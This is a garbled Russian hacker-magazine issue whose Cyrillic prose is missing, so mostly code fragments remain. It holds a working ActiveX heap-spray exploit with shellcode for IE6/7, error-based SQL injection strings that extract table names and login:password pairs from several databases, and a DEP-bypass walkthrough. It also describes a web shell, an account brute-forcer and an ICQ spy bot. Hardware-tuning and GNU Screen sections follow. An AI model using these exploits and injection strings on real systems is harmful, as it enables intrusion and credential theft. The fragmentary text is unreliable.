CALL DWORD PTR DS:[ESI+CC],
ESI ,
SEH,
ESI.
, , ,
.
,
,
. ,
.
308 .
, SEH .
, 308 , 4 SEH-.
100 ,
ESI
.
COMRaider, BuildArgs.vbs:
beg=256
stri=String(beg,"0")
letter="A"
for i=(beg+4) to 500 step 4
if letter="Z" then
letter ="A"
end if
stri=stri+String(4,letter)
letter=Chr(Asc(letter)+1)
, 260
, 4
ESI. 4
, 4 ,
.
32- 4 ,
SEH. ,
:
fill= String(260, "X")
parent.strs.add """&fill&"CCCCFFFF
AAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFBBBB"""
:
ESI=CCCC (43434343)
SEH=BBBB (42424242)
=AAAA (41414141)
, ESI,
CCCC , .
SEH-.
,
,
SEH-. ,
, ,
,
, ,
,

. ,

. .
,
.
( IE 6/7,
) .
(exploit-db.com/exploits/10007) SEH-
jmp esp user32.dll.
ESP ( ),
.
user32.dll
. ,

. ,
. -
061

RAZ0R HTTP://RAZ0R.NAME
heap spray ( , !).

,
- (nop)
.
, iexplorer .
, 99%, , . 0x0d0d0d0d
.
c
JavaScript.
heap spray:
var bigbk=unescape("%u9090%u9090%
u9090%u9090"); //90 nop,
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk; //
//nop nop-slide
var mem=new Array();
for(i=0; i<400;i++)
mem[i]=bigbk+shell; //
nop-slide,

.
, unicode-.
. 0xAA
0xBB 0xCC 0xDD JavaScript unicode
%uBBAA %uDDCC.
JavaScript. .
, .
JavaScript :
,
. , , , ,
( perl): C:\>perl shellcodegen.pl exec
notepad. , :
<HTML>
<HEAD>
<TITLE>][akep ActiveX SEH Sploit</
TITLE>
</HEAD>
<BODY>
<OBJECT id='vuln'
classid='clsid:68AC0D5F-0424-11D5822F-00C04F6BA8D9'></object>
<SCRIPT>
function Exploit(){
// exec notepad
var shell = unescape("%ue8fc%u0089
%u0000%u8960%u31e5%u64d2%u528b%u8b3
0%u0c52%u528b%u8b14%u2872%ub70f%u26
4a%uff31%uc031%u3cac%u7c61%u2c02%uc
120%u0dcf%uc701%uf0e2%u5752%u528b%u
8b10%u3c42%ud001%u408b%u8578%u74c0%
u014a%u50d0%u488b%u8b18%u2058%ud301
%u3ce3%u8b49%u8b34%ud601%uff31%uc03
1%uc1ac%u0dcf%uc701%ue038%uf475%u7d
03%u3bf8%u247d%ue275%u8b58%u2458%ud
062
301%u8b66%u4b0c%u588b%u011c%u8bd3%u
8b04%ud001%u4489%u2424%u5b5b%u5961%
u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86
%u016a%u858d%u00b9%u0000%u6850%u8b3
1%u876f%ud5ff%ue0bb%u2a1d%u680a%u95
a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u7
5e0%ubb05%u1347%u6f72%u006a%uff53%u
6ed5%u746f%u7065%u6461%u0000");
//
// 0x0d0d0d0d c 99%
var bigbk=unescape("%u9090%u9090%u
9090%u9090");
bigbk=bigbk+bigbk;
for(i=0; i<400;i++)
mem[i]=bigbk+shell;
var bf=unescape("%63"); //
var buf="";
while (buf.length<260) buf=buf+bf;
buf+=unescape("%61%61%61%61"); //
ESI
buf+="FFFF"+unescape("%62%62%62%62"
);//
buf+="THX_TO_MY_WIFE_FOR_
LOVE!FFFFFFFF";
buf+=unescape("%0d%0d%0d%0d");//SEH

vuln.SubmitToExpress(buf);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
, 308 , :
"<260>aaaaFFFFbbbbTHX_TO_
MY_WIFE_FOR_LOVE!FFFFFFFF[ SEH
]". ESI, bbbb
,
.
308 0x0d .
html-,
-
"notepad"
(,
ActiveX ).
, SEH CALL [ESI+CC]
.
:
var i=0;
// c
var bigbk=unescape("%u0d0d%u0d0d%u
0d0d%u0d0d");
bigbk=bigbk+bigbk;
for(; i<200;i++) mem[i]=bigbk+unes
cape("%u0d0d%u0d0d%u0d0d%u0d0d");
// nop-
var bigbk2=unescape("%u9090%u9090%
u9090%u9090");
while(bigbk2.length<0x40000)
bigbk2=bigbk2+bigbk2;
for(; i<400;i++)
mem[i]=bigbk2+shell;
// 0x0d0d0d0d c 99%
var bf=unescape("%63");
var buf="";
while (buf.length<260) buf=buf+bf;
//
//CALL [0x05050505+CC]
//EIP 0x0d0d0d0d.
.
f+=unescape("%05%05%05%05"); //ESI

buf+="FFFF"+unescape("%61%61%61%61"
);//
buf+="HI_TO_KONONENCHEG_
FFFFFFFFFFFFFF";
buf+=unescape("%62%62%62%62");//SEH

vuln.SubmitToExpress(buf);
. . .
, ,
FileMon,
:\31337.txt. ,
ImportBodyText,
,
. ,
,
BodyText:
. . .
vuln.ImportBodyText("C:\boot.ini");
alert(vuln.BodyText);
. . .

,
IE 6/7 ActiveX.

,
,

.

,

. , ,
,
, .
,
, ,

Digital Security Research Group.
research@dsec.ru! z
X 04 /135/ 10

(Positive Technologies) http://devteev.blogspot.com
ERROR
BASED SQL-INJECTION

ERROR-BASED
SQL-INJECTION
SQL-
, ,

(union).

. ,
?!
, SQL-,

. .
,

, , .
ERROR-BASED BLIND SQL INJECTION MYSQL
Qwazar "
" SQL- ,
MySQL. ,
.

MySQL >= 5.0:
064
mysql> select 1,2 union select co

unt(*),concat(version(),floor(ran
d(0)*2))x from information_schema.
tables group by x;
ERROR 1062 (23000): Duplicate
entry '5.0.841' for key 1
mysql> select 1 and (select 1
from(select count(*),concat(ver
sion(),floor(rand(0)*2))x from
information_schema.tables group by
x)a); ERROR 1062 (23000): Duplicate
entry '5.0.841' for key 1
,
( MySQL < 5.0, ),
,
rand().
, http-.
mysql> select 1 and row(1,1) >

(select count(*),concat(version(),0x
3a,floor(rand()*2))x from (select 1
union select 2)a group by x limit 1);
...
1 row in set (0.00 sec)
...
mysql> select 1 and row(1,1)>(select
count(*),concat(version(),0x3a,floo
r(rand()*2))x from (select 1 union
select 2)a group by x limit 1);
ERROR 1062 (23000): Duplicate entry
'5.0.84:0' for key 1

:
http://server/?id=(1)and(select+1+fr
om(select+count(*),concat((select+ta
X 04 /135/ 10
blind SQLi MySQL

ble_name+from+information_schema.tables+limit+0
,1),floor(rand(0)*2))x+from+information_schema.
tables+group+by+x)a)-http://server/?id=(1)and(select+1+from(select
+count(*),concat((select+table_name
+from+information_schema.tables+limit+1,1),
floor(rand(0)*2))x+from
+information_schema.tables+group+by+x)a)--
Qwazar MySQL,
3.x, -
. , , MySQL 4.1,
.
, TinKode,
blind SQL-Injection
Web- army.mil.
Web-,
MSSQL 2000/2005,
.
TinKode ,
MSSQL
, "" :
select convert(int,@@version);
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar
value 'Microsoft SQL Server 2008 (RTM) 10.0.1600.22 (Intel X86)
Jul 9 2008 14:43:34
Copyright (c) 1988-2008 Microsoft
Corporation
Enterprise Edition on Windows NT 6.1
<X86> (Build 7600: ) (VM)
' to data type int.
, SQL-,
,
Microsoft SQL Server. ,
:
http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=1)))-http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=2)))-...
X 04 /135/ 10
Qwazar MySQL 3.x!
, Sybase ASE, MS SQL

Server, Transact-SQL,
, HTTP://WWW
.
(.
links
). MSSQL

qwazar.ru/?p=7
Sybase.
tinkode.baywords.
com.
.
, MySQL
,
blind SQL Injection. PostgreSQL ""
:
web=# select cast(version() as numeric);
ERROR: invalid input syntax for type
numeric: "PostgreSQL 8.2.13 on i386portbld-freebsd7.2, compiled by GCC cc
(GCC) 4.2.1 20070719 [FreeBSD]"
SQL
, :
http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+0)+as+numeric)-http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+1)+as+numeric)-...
WARNING
warning
!

!
,

!

SQL-,

065
BLIND SQLI MSSQL
'<:abcdef>' from dual)) from dual;

ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML
processing
LPX-00110: Warning: invalid QName
":abcdef" (not a Name)
...
SQL>
, .
, .
:
MSSQL
TinKode MSSQL/2008
Oracle. ,

.
, error-based blind SQL
Injection ,
XML. ,
XMLType(),
(LPX-00XXX):
SQL> select XMLType((select
'abcdef' from dual)) from dual;
ERROR:
processing
LPX-00210: expected '<' instead
of 'a'
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line
301
ORA-06512: at line 1
no rows selected
SQL>
. substr()
. ,
:
select XMLType((select
substr(version,1,1) from
v$instance)) from users;
066
... ..
SQL> select * from users where id

= 1 and(1)=(select XMLType((select
'<:abcdef>' from dual)) from
dual);
select * from users where id =
1 and(1)=(select XMLType((select
'<:abcdef>' from dual)) from dual)
ERROR at line 1:
ORA-00932: inconsistent datatypes:
expected NUMBER got -
,
limit offset,

. , XMLType()
XMLTYPE()

SQL-
, ,
.
XMLType(),

,
:
'<abcdef:root>' from dual)) from
dual;
ERROR:
processing
LPX-00234: namespace prefix
"abcdef" is not declared
...
.
,
at ("@") .
;) upper().
, :
select id
rnum from
select id
rnum from
...
from(select id,rownum
users a)where rnum=1;
from(select id,rownum
users a)where rnum=2;
, , ,
hex-. ,

X 04 /135/ 10
blind SQLi Oracle

blind SQLi PostgreSQL
MSSQL: /?param=1
and(1)=convert(int,@@version)--
blind SQLi Sybase

(ascii),
. ,
:
select * from table where id =
1 and(1)=(select upper(xmltype
(chr(60)||chr(58)||chr(58)||(s
elect rawtohex(login||chr(58)|
|chr(58)||password)from(select
login,password,rownum rnum from
users a)where rnum=1)||chr(62)))
from dual);
select * from table where id =
1 and(1)=(select upper(xmltype
(chr(60)||chr(58)||chr(58)||(s
elect rawtohex(login||chr(58)|
|chr(58)||password)from(select
login,password,rownum rnum from
users a)where rnum=2)||chr(62)))
from dual);
...
http 214 (107

hex-),
Oracle >=9.0 (. ):
http://server/?id=(1)and(1)=(selec
t+upper(xmltype(chr(60)||chr(58)||
X 04 /135/ 10
chr(58)||(select+rawtohex(login||c
hr(58)||chr(58)||password)from(sel
ect+login,password,rownum+rnum+fro
m+users+a)where+rnum=1)||chr(62)))
from dual)--

SQL , ,

:
Sybase: /?param=1
and(1)=convert(int,@@version)-MySQL>=4.1<5.0: /?param=(1)
and(select 1 from(select count
(*),concat(version(),floor(ran
d(0)*2))x from TABLE_NAME group
by x)a)-
/?param=1 and row(1,1)>(select co
unt(*),concat(version(),0x3a,floor
(rand()*2))x from (select 1 union
select 2)a group by x limit 1)--
SQL> select utl_raw.cast_to_varch

ar2('61646D696E3A3A504073737730726
4') from dual;
UTL_RAW.CAST_TO_VARCHAR2('61646D69
6E3A3A5040737377307264')
MySQL>=5.0: /?param=(1)and(select
1 from(select count(*),concat(v
ersion(),floor(rand(0)*2))x from
information_schema.tables group
by x)a)--
admin::P@ssw0rd
SQL>
Oracle >=9.0: /?param=1

and(1)=(select upper(XMLType(ch
r(60)||chr(58)||chr(58)||(selec
t replace(banner,chr(32),chr(58))
from sys.v_$version where
rownum=1)||chr(62))) from dual)--
,
error-based
blind SQL Injection :
PostgreSQL, MSSQL, Sybase,
MySQL >=4.1 Oracle >=9.0.

http-, :
PostgreSQL: /?param=1
and(1)=cast(version() as
numeric)--
,
- .
, ,
SQL .
.
, z !
067

Digital Security, dookie@inbox.ru

,
,

.
DEP
HARDWARE-DEP
,
DEP.
,
. DEP
, ,
.

ActiveX
IE6/IE7,

QuickSoft EasyMail Object

,

. ,
SubmitToExpress() 256
, ESI,
SEH.
cccc260ccccAAAAffffBBBBfffffffff
fffffffffffffffffffffffDDDD
ESI = AAAA
RET = BBBB
SEH = DDDD
,
heap-spray
SEH CALL [ESI+CC]
.
068
, ,
DEP (Data Execution Prevention),
, .
ActiveX, DEP,
, ASLR (Address space
layout randomization), ,
.
.
WHO IS MISTER DEP?
,
DEP , ,
.
, DEP ,
Microsoft,
NX/XD (,
AMD NX, Intel XD)
. , ,
.
- , EIP
,
(, ,
). ,
DEP
NX/DX Windows c (>= Windows XP SP2).
Microsoft ,
software-DEP.
. , ,
/ .

SEH .
SafeSEH,
DEP.
ACCESS VIOLATION
, DEP?
? , , DEP.
,
. BIOS
,
. Intel Core2
Duo , . , ,
software-DEP
( NX/XD ,
X 04 /135/ 10
DEP, DEP :). ,

Windows XP, DEP .
IE6/IE7 .
.
DEP . C:\boot.
ini, ,
,
,

DEP
. FrontEnd
C:\boot.ini.
DEP:
/noexecute=OptIn
XP/Vista. DEP

DEP
,
E Access.
DEP IS DEAD
DX
/noexecute=OptOut
Windows Server 2003 SP1. DEP
,
.
/noexecute=AlwaysOn DEP
, .
/noexecute=AlwaysOff DEP (
).
.
SysInternals Process Explorer
.
software-DEP OptOut, IE7 . ,
, SEH
, ,
,

.

.
, ,

CALL . ,
X 04 /135/ 10
SEH
.
, ( ), CALL
[ESI+CC] ,
software-DEP. ,

, ,
,
SEH- (
heap-spray.
, software-DEP,
, hardware-DEP
( NX/
XD). , , SEH
,
. ,
, NOP
Access
violation when executing [0D0D0D0D]. , ,
JavaScript heap-spray,
.
,
,
DEP. ,
ret2libc.

, .
, ,
, ,
, WinExec. ,
WinExec
! ,
,

,
-, ,
/ ,
/
cmd.exe ( ). ,
.
-. , ,

- . 2005
DEP .
,
VirtualAlloc() .
, ,
,
( , ),

,
. memcpy(),

.
memcpy(), ,
.
, ,
, .
069
IN PVOID ProcessInformation,
//
DEP ,
0x0000002
IN ULONG
ProcessInformationLength
// (0x4) 4
);
DEP

! , ?
Skape Skywing
ntdll.dll:
Address1:
cmp al,0x1 ; EAX=1 ?
Process Explorer
DEP
VirtualProtect(). , ,
, VirtualProtect()
(
, 0x000040 RWX)
. .
VirtualProtect(
IN
LPVOID lpAddress,
// 0x0D0D0D0D
IN
SIZE_T dwSize,
// 0x1
IN
DWORD flNewProtect,
// - 0x40
IN
PDWORD lpflOldProtect
// , ,
( ),
0x05050505
);
070
VirtualProtect
. Windows
API DEP? Windows
XP SP3 ( )
API SetProcessDEPolicy(),
- DEP. , -,
. .
SetProcessDEPolicy()
NtSetInformationProcess():
NtSetInformationProcess
(
IN HANDLE ProcessHandle,
// , 0xff

push 0x2 ; 0x2

( )
pop esi ; ,
(0x2) ESI
je LdrpCheckNXCompatibility + 0x1a
; EAX=1
. . .
mov [ebp-0x4],esi ;
0x2( ESI) EBP-4
jmp LdrpCheckNXCompatibility +
0x1d ;
. . .
; , 0? ( 0x2)
cmp dword ptr [ebp-0x4],0x0
jne LdrpCheckNXCompatibility+0x4d
; 4!=2,
. . .
push 0x4 ; 0x4
IN PROCESS_INFORMATION_CLASS
ProcessInformationClass,
// 0x22
lea eax,[ebp-0x4] ; EAX

ebp-0x4, 0x2
X 04 /135/ 10
DEP -
push eax ;
0x2
push 0x22 ; 0x22
push 0xff ; 0xff (-1)
call NtSetInformationProcess
; ,
; DEP
jmp
LdrpCheckNXCompatibility +
0x5c ; ...
. . .
pop esi
leave ;
ret
0x4 ; 4

, ,
( AL )
DEP ,
. ,
,
LEAVE ,
, , ESP = EBP. ,
EAX 1. ,
,

1. , , , AL
, ntdll.dll:
. . .
Address2
mov
al,0x1
ret
0x4
retn 8. :

(Ctrl+S):
al,1
retn 0x4
Address2.
Address1 :
cmp
push
pop
al,0x1
0x2
esi
FIGHT!
OllyDbg (File>Attach) iexplore

.code ntdll.dll
(View->Memory). X 04 /135/ 10
.
,
EBP 0x4646464646 ,
(BBBB). DEP,
EBP 0x2:
mov

, ,
. ,
ESI. , ,
, CMP
[ESI+180],1. :
xor ebx, ebx ;
push -1
cmp [ESI+],EBX ; 0

CALL [ESI+CC], .
, ,
ESI+CC 0. ,
0, ret
:
call emsmtp.026c6232 ;

xor eax,eax ;
pop edi ;
, :
cccc260ccccAAAAffffBBBBCCCCXXXXX
XXX100XXXXXXXXXXX
AAAA=0x05050505
BBBB=Address2
CCCC=Address1
X=0x0D
cccc260ccccAAAAffffBBBBffffffffC
CCCXXXXXXXX100XXXXXXXXXXX
pop esi
pop ebx
leave
;
retn 0x8
;
(AAAA)
,
,
, NOP .
ESI 0x05050505, 0 ,
,
BBBB CCCC, BBBB
[ebp-0x4],esi
, ,
, , leave NtSetInformationProcess!
,
(BBBB ),
,
. , ActiveX
ASCII .
0x7C, ActiveX ? 0x3F.

,

0x7C. DEP,
ActiveX. ,
CALL [ESI+CC] ,
.
, , ESI+CC
,
, .
,
! CALL .
.
: CALL
DEP,
, . CALL
AL , ,
je LdrpCheckNXCompatibility+0x1a
DEP.
, CALL,
ActiveX,

MultiByteToWideChar(). , Z
. ? ,
,
je. Z=1,
071
, . ,
CMP AL,1,
2 , , PUSH 2.
, je
DEP. ,

. :
cccc260ccccAAAAffffBBBB
AAAA = 0x05050505 ,
Address1
BBBB = 0x0D0D0D0D ,
, ,
Address1 . , 0x7C91CD26.
ntdll.dll.
, ,
, DEP.
,
, .
0x0D0D0D0D ,
,
, ,
CALL[ESI+CC] (0x050505D1) ,
, 0x267C91CD.
, : 36 .
36 ,
. 4 . ,
,
( ,
). ,
,
072
DEP
, ,
0xXXYY0000. ,
0xXXYY0024 (
+ 4 ).
0x4, +0xCC
, 0xD1.
0x3
0x05050508.
,
little-endian .
(

DVD).
DEP
,
.
,

,
, DEP. , ,
, Z
CALL ,
,
,
ret2libc .
(ASLR),
VirtualProtect
NtSetInformationProcess. .
, IE8 DEP .
, IE8
DEP (
SetProcessDEPPolicy).
DEP-
ret2libc,
. , ,
,
BlackHat 2010 DC,
(Dionysus Blazakis) IE8 ASLR( ) DEP. ActionScript Java,

.
JIT-spray,
z
X 04 /135/ 10

icq 884888
X-TOOLS

: ProxFetch
: *NIX/WIN
: X1MACHINE
:).
K-Shell
, ASP.NET

, IIS.
K-Shell
, PHP:
K-Shell

(, ,
, ..). ,
,
,

ProxFetch x1machine.com.
, ProxFetch
,
,
,
ip . :

;
c++,
;
;
;

;
GeoIP;
;
-;
TOR;
.

ProxFetch
x1machine.com/?p=72.
: K-SHELL
: WINDOWS 2000/2003/XP/VISTA/7
: KIKICOCO
074
(md5);
( CMD.NET,
W32, WSH, SQLServer);
( );

(Server IP, Machine Name, Network
Name, User Name ,
OS Version, System Time, IIS,
, ,
, );

/;
;
;
IIS;
;
event ;
(, , ,
, , ,
, );

.
,

.
: ICQ EXAMBOT
: WWW.NAKODIM.RU

-?
ICQ Exambot
nakodim.ru.
icq-,
-

.

,
5000 (1200 ICQ).

,
.
,

( .NET Framework 2.0).
! :)
: VKONTAKTE MULTITHREADS BRUTEFORCE WITH ANTICAPTHCA

&& PROXY
: *NIX/WIN
: DR.TRO
(
:),
Dr.TRO, Perl.
:
perl brute.pl <threads> <proxy
change time> <pause> <anticaptcha
key> <accounts file> <passwords
file> <proxy file> <nobad> <spliter>

:
<threads> ;
<proxy change time>
,
;
<pause>
;
<anticaptcha key> ;
X 04 /135/ 10
: ICQ SPY BOT V 1.0

: WINDOWS 2000/2003/XP/
VISTA/7
: INSIDER

<accounts file>
;
<passwords file>
;
<proxy file> ;
<nobad> ;
<spliter>
.
!
AntiCaptcha.
pm, .
: [ WEB ] BRUTE
FORCER V1.1
: [X26]VOLAND
, basic-
-?

- 1' or 1=1/*,

. [ Web ] Brute Forcer
[x26]VOLAND
:).
:
POST;
GET;
basic-
HEAD;
FTP;
( 1 1000 );
REQUEST ;
Cookies;

( );
3 (1 , , 1 );
plain HTML
input , ;
(,
, ).
X 04 /135/ 10
-
,
- .
<form>.
action url
URL. method
/ .
<form>
<input> ( ).
, ,

.
<input> name.
login, nickname,
username .., .
name
.
.

( name value) request-.
<form> <input>
type=submit, . Submit-.
- <input>
name, .
. ,
.
, (
/
, ).

(

), ,
, ,

(
).
( ) ,
. Enjoy!

,
forum.antichat.ru/thread109600.html.:)

/
ICQ SPY BOT.
,

.
:
;
;
;
;

;

( 800 );
ICQ ;

;
IP ;
;
;
;

PID;

;
;

;

url;
;
;
.
,

.
,
,
:). z
075

Mifrill maria.nefedova@glc.ru

2010

-
2009 , , lan- .
,
, ,
.
,
CAROLINACON
: 19 21
: ,
: www.carolinacon.org
CarolinaCon

2005 ,
.
,
,
Microsoft, Intel
. CarolinaCon
2600.
?
. ,

,
074
076
. , ,

, , ,
- . ,
, 2010
.
,
.
:
Linux ?,
, , ,
OMG! !!!.
,

, .
CANSECWEST
: 20 26
: ,
: cansecwest.com
,
?
,
,

CanSecWest.
, ,
, IT-.
, , , .

(, ) ,
, ,

. ,

.
X 04 /135/ 10
SUN TECH DAYS
: 8 9
: -,
: developers.sun.ru/techdays2010
Sun Tech Days ,

, , ,
.
Sun Microsystems STD
,
.
,
( !),
X 04 /135/ 10

Sun, .
, ,
Java,
.
HACK IN THE BOX
: 19 22 ; 29
2
: , ; ,
: www.hackinthebox.org
Hack in the Box

,
. HITB 2003
:
,
. ,

, ,
IT-
.

,
HITB, , . , , ,
.
HITB Dubai,
, , , .
077

: .

,
.
, -,
McAfee;
TEHTRI-Security
;
. ,
.
BLACKHAT EUROPE
: 12 15
: ,
: www.blackhat.com

BlackHat, , ,

, .
BlackHat
.
13 . ,
BlackHat Europe.

,
,
: SAP ,
Adobe Flash, PDF Adobe Reader ,

,
ZIP, 7ZIP, RAR, CAB.
:
,
Fortinet Inc., Invisible
Things Lab,
Trustwave Spiderlabs, Context
Information Security .
:
078

HOPE.
, ,
, .
,
,
, ,
. , ,
BlackHat ,

-,
IEEE 802.11, TCP/IP .
NOTACON
: 15 18
: ,
: www.notacon.org
Notacon
,
, .
, , 2003
, ,
,

.
, ,
, ,
; , ,
,
,
. ,
Notacon

, , , .
, , ,

.
BLACKHAT USA
: 24 29
: -,
: www.blackhat.com
BlackHat
, - -. ,
,
, ,
.
, IT-,
.
, BlackHat 2010 ,
,
,
, BlackHat
2010 .
HACKERS ON PLANET
EARTH (HOPE)
: 16 18
: -,
: thenexthope.org
1994 2600: The
X 04 /135/ 10
HITB'09
!
Hacker Quarterly,
.
HOPE
,
. ,
:
HOPE: Hackers On Planet Earth, Beyond HOPE,
H2K, H2K2, The Fifth HOPE, HOPE Number
Six, 2008
The Last HOPE.
08
2010- The
Next HOPE,
.

, ,
, - ( ).
-, Cult of the Dead Cow.
, ,
,
. ,
,
.
ASSEMBLY
:
: (),
: www.assembly.org

. Assembly
-
1992 .
, Assembly (X 04 /135/ 10
DEFCON , , ..
.
HUMAN .
9 .
) -
5000 .
,
-
, ,
.
2007 Assembly
: Assembly Winter,
, ,
( -);
Assembly Summer
,
. - ,
.
Assemly Winter10, , ,
, - . Asembly Summer
,
.
, , ,

.
DEFCON
: 30 1
: -,
: www.defcon.org
-,
IT-. DEFCON
,
.
,
18
, :).
DEFCON
,
HACKERS
ON PLANET EARTH.
,
, ,
,
. DEFCON 18
:
,
15
, , ; IT

,
,
, DEFCON!;
, ,
, , ,
, , p2p .
,

.
CHAOS CONSTRUCTIONS
:
: - (),
: cc.org.ru
Chaos Constructions, CC,
,

, CC
1995 .
, , -,
,
, , . Chaos
Constructions
,

, -,

.
\ , ,
,
,
. Chaos Constructions, , ,
,
.
CC10 ,
, ,
, . z
079
UNIXOID
hatchet maks.hatchet@yandex.ru
, ,
, , ,
. ,
( )
, .
,
.
,

(, , ). ,
:
. , 4 2 ,
,
.
,

( ).
080

.
,

.

Linux
/proc /sys. ,
,

. ,
:
$ cat /sys/devices/system/cpu/cpu0/
cpufreq/scaling_governor

,
:
# echo conservative > /sys/devices/

system/cpu/cpu0/cpufreq/scaling_
governor
cpufreq 11
, ,

. :
$ ls -1 /sys/devices/system/cpu/
cpu0/cpufreq
affected_cpus ,

cpuinfo_cur_freq

cpuinfo_max_freq
cpuinfo_min_freq
scaling_available_frequencies
X 04 /135/ 10
cpufreq-info,

: , ,
.. :
$ sudo cpufreq-set -g powersave
'-f':
cpufreq-info
scaling_available_governors
scaling_driver
scaling_governor
scaling_max_freq
,

scaling_min_freq
,

scaling_setspeed

,

Linux,
:
1.
,
. ,
,
cpufreq.
:
acpi-cpufreq ACPI (P-States Driver)
p4-clockmod Pentium 4
speedstep-centrino Pentium M
speedstep-ich Pentium III-M, P4-M, ICH2/
ICH3/ICH4
speedstep-smi Pentium III-M, 440 BX/ZX/MX
powernow-k6 AMD K6
powernow-k7 AMD Athlon
powernow-k8 AMD Opteron, Athlon 64,
Athlon64X2, Turion 64
cpufreq-nforce2 nVidia nForce2 ( FSB
PCI/AGP)
,
.
2.

, -
. Linux

:
X 04 /135/ 10
1. performance ,
,
.
2. ondemand .
3. conservative ondemand,
( ,
).
4. powersave .
5. userspace ,

.

,

:
$ sudo cpufreq-set -f 1.22 GHz

GOVERNOR /etc/init.d/
cpufrequtils (
ondemand).

,
.
,
.
fancontrol
lm-sensors.
,
lm-sensors, ,
sensors-detect.
<Enter>.
Do you want to add these lines automatically?,
yes,
modprobe.
:
# modprobe cpufreq_ondemand

scaling_governor:
# echo ondemand > /sys/devices/
system/cpu/cpu0/cpufreq/scaling_
governor

.
ondemand ,
, ,
, . ,
. ,
userspace,

scaling_setspeed:
# echo 1000 > /sys/devices/system/
cpu/cpu0/cpufreq/scaling_setspeed
scaling_
available_frequencies. ,
, cpufrequtils,
. Debian/Ubuntu:
$ sudo apt-get install cpufrequtils
$ sudo modprobe i2c-nforce2 asb100

w83l785ts
, sensors.
,
.
CPU Fan CPU Temp,
.
( 4000 ),

( 60 ).
. ,
fancontrol,

, .
,

pwmconfig,
.
pwmconfig <Enter>
. ,
Select fan output to configure, or other
action:, 1
.
,
,
081
UNIXOID
hdparm:
. ,
,
.
, ,
.
,
<Enter>,
.
pwmconfig
, , , fancontrol:
$ sudo /etc/init.d/fancontrol start
, fancontrol
(
),

. ,
Acer Aspire One
acerhdf (www.piie.
net/?section=acerhdf).
Sony Vaio Fan Silencer (www.taimila.
com/fansilencer.php). ,

.
, , -
,
, .
:

,
,

( 3D-).
,
.
. nVidia,
Linux nvclock (www.
linuxhardware.org/nvclock).

,
082
,
.
'-i'
-- Sensor info --,

.
nvclock '-f' '-F',
:
$ sudo nvclock -f -F 60
10 100
10. ,
.

, .
, ,

. , ,

.
?
, .
,
,
.
,
.
,
. :
,
, .
,

.
,
,
, .
,
.
nvclock , ,

, /etc/fstab ( swap
).

, ext4,
,
.
, , Linux
,

. ext2, ext4, reiserfs, , ,

FAT, .

,
defrag (http://ck.kolivas.org/apps/defrag)
Shake (http://vleu.net/shake). .

(shake-0.99.1-Linux.sh),
.
, , .
Debian Ubuntu
apt,
http://vleu.
net/apt.
,
:
$ sudo shake -pvv ///
5
15
.
.
.
.
X 04 /135/ 10
( )
. ,
,

.
-
.
, Linux
,

.
/proc/sys/vm:
$ ls -1 /proc/sys/vm
laptop_mode (120)

-
(

,
?).
dirty_writeback_centisecs (12000)

.
dirty_expire_centisecs (12000)
.
dirty_ratio (10) , (
).
dirty_background_ratio (1) ,
.
, .
sensors lm-sensors
,
.
, ,
,
,

.
hdparm. , :
$ sudo hdparm -B 1 -S 12 /dev/sda
'-B 1'
. 254, 1
pwmconfig

127 ,
.
'-S 12' , .
255 : 1 240
5 , 0 .
Automatic Acoustic Management,

,
(, , 10%).
-
hdparm. :
$ sudo hdparm -M 128 /dev/sda
, 254.
,
/,
,
(, 128 , 254 , ,
, ,
).
,
,
, . ,
, ,
.z
X 04 /135/ 10
083
UNIXOID
zobni n@gmail.com
GNU Screen
tmux
GNU Screen UNIX- .

, . Screen FAQ , .
?
084
X 04 /135/ 10
tmux
?
, , SSH-.
,
,
.

.
, .
<Ctrl+Z>,
,

, jobs. SSH-
, .
?
Screen

. ,
Screen , SSH-
. ,
screen, .
less /
var/log/messages, <Ctrl+A C>, , top,
irssi ..
<Ctrl+A P>
.
SSH-.
Screen .
<Ctrl+A D>,
Screen 'r',

. ,
X 04 /135/ 10
-,
,
. ,
.
, Screen.

,

mutt alpine
.

, X- ,
GTK- QT- .
, ,
, ,
(, ()
, ratpoison, ion3 dwm,
Screen).
?
Screen. .
-, ,
,
. -, Screen

,
..,
,

.
, ,
,

. ~/.screenrc
:
$ vi ~/.screenrc
#
startup_message off
# utf8
defutf8 on
#
( )
vbell on
#
defscrollback 1000
#

autodetach on
# Login-
shell -$SHELL
# xterm (
)
termcapinfo xterm* ti@:te@
#
shelltitle '$ |sh'
#
hardstatus alwayslastline "%{+b wk}
%c $LOGNAME@%H %=[ %w ] "
# <Esc>
su
bind \033 screen -ln -t root 9 su
.

. Screen
.
:

.
, , Screen
,
shelltitle. '$ |sh',
,
,
'$ ' (

), sh (
).
.
, ~/.bashrc:
case $TERM in
screen)
export PROMPT_COMMAND = 'echo -n
-e "\033k\033\\"'
;;
esac
,
(hardstatus). Screen ,
.
:
12:18 user@hostname [ 0 sh 1 mc 2* irssi ]
085
UNIXOID
Screen
tmux

_@_,

.
.
Screen
, ,
(
PS1). screen,
.
<Esc>
root-.
Screen
, .
- ,
, .
.
, ,
Screen
<Ctrl+A> (<C-a>
Screen),
- .
<C-a c>
,
.
:

Screen
C-a 0..9
0..9
C-a "

C-a n

C-a p

C-a c

C-a k

C-a C-a

C-a S

C-a |

C-a Tab

C-a z

C-a d
screen
C-a M

C-a ?

C-a :
Screen
<C-a d>, , Screen

.
,
,
( screen),
.
'-ls' screen,
'-r'.
,
'-x',
'-r'.
<C-a M>,
.

Screen ,
TMUX:
set -g lock-after-time 1800
set-password -c '$2a$06$7LpuTSfDjcz.KD3a9mdEuuJmC.zEq6RBqHWMjdv9/qqzrfWedUBHe'
bind L lock-server
086

. , ,

watch. Screen
. <C-a C-[>
.

<C-a C-]> .
<C-a h> Screen ,

less. :
hardcopy._. ,

bind .
, ""
<C-a Space>
:
